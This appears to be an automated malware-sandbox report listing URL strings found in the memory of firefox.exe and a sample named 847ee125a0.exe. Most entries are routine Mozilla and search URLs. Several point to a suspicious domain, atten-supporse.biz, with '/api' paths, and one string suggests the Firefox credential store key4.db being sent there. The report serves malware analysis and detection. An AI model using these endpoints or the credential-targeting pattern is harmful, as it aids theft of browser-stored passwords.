Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateSERVICE_UPDATER_COULD_NOT_BE_STARTEDSERVICE_STILL_APPLYING_ON_
Source: firefox.exe, 00000034.00000002.2972531378.000001EB40157000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E04D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947637742.000001EB380D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851696192.000001EB37DD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31FDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2945708134.000001EB37DD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.restore_pinned_tab
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/migration/bran
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xultoolbar-context-menu-bookmarks-toolbar-
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 847ee125a0.exe, 00000024.00000003.2676443600.0000000005521000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2845668781.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2947037624.000001EB37FC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000034.00000002.2969544005.000001EB3E05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3693A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/https://www.google.com/search
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000034.00000002.2953557870.000001EB39184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.cainsertTombstones/valuesTable
Source: firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000034.00000003.2851180323.000001EB3DC90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2965979540.000001EB3DC90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000034.00000002.2937567313.000001EB36C35000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2972531378.000001EB40157000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2895013317.000001EB40A84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2891951872.000001EB40AE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2974030680.000001EB40AE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2973877144.000001EB40A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000034.00000002.2914139986.000001EB316A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2927413392.000001EB35729000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000034.00000002.2940906463.000001EB3704E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB3786C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2942571768.000001EB37813000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB3760B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37684000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37608000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851918874.000001EB369AC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpresource://gre/modules/ShortcutUtils.sys.mjs
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2984219915.0000270DAFC19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000034.00000002.2934876567.000001EB3699E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: 847ee125a0.exe, 00000024.00000003.2735654272.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/$
Source: 847ee125a0.exe, 00000024.00000003.2726906842.0000000000C72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/;L
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/J
Source: 847ee125a0.exe, 00000024.00000003.2676214242.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2703118608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2676813728.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/T
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/U
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api)
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiE
Source: 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiQ
Source: 847ee125a0.exe, 00000024.00000003.2703118608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apille
Source: 847ee125a0.exe, 00000024.00000003.2735654272.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apim
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001097000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apis
Source: 847ee125a0.exe, 00000024.00000003.2735654272.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/d
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/e
Source: 847ee125a0.exe, 00000024.00000003.2728328918.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2726771223.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/t
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/tes=
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/u35n
Source: 847ee125a0.exe, 00000024.00000003.2703118608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/w)
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000001014000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/za
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
Source: 847ee125a0.exe, 00000027.00000002.2995187227.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api.default-release/key4.dbPK
Source: 847ee125a0.exe, 00000024.00000003.2748896116.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000002.2996848626.0000000000D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api//%ProgramFiles%
Source: firefox.exe, 00000034.00000002.2958491496.000001EB39672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000034.00000002.2981779926.000018DAC0004000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 847ee125a0.exe, 00000024.00000003.2678457153.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2875895750.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000034.00000002.2944698267.000001EB37A48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31FAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180use
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000034.00000002.2957862215.000001EB3959E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000034.00000002.2949573209.000001EB3844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 847ee125a0.exe, 00000024.00000003.2628463092.000000000551F000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000024.00000003.2628581743.0000000005508000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789722897.00000000056C8000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2789358745.00000000056DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2790868435.000001EB35A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000034.00000002.2933325693.000001EB365B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2932523071.000001EB364C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000034.00000002.2933325693.000001EB365B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000034.00000002.2972531378.000001EB40157000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: 847ee125a0.exe, 00000024.00000003.2678457153.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, 847ee125a0.exe, 00000027.00000003.2875895750.00000000056B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: firefox.exe, 00000034.00000002.2913294398.000001EB31543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2913294398.000001EB315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2918653771.000001EB32B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000034.00000002.2948502881.000001EB381B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851659725.000001EB381B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31EE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000034.00000002.2958491496.000001EB396DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2941979451.000001EB37617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2968787675.000001EB3DF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.2851659725.000001EB381B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000034.00000002.2910860360.000001EB25D30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2910860360.000001EB25D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000034.00000002.2917539467.000001EB31F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsAdd
Source: firefox.exe, 00000034.00000002.2916919570.000001EB31E2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2916919570.000001EB31E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000034.00000002.2940056297.000001EB36FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000034.00000002.2964775927.000001EB3DB3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000034.00000002.2923800045.000001EB33570000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
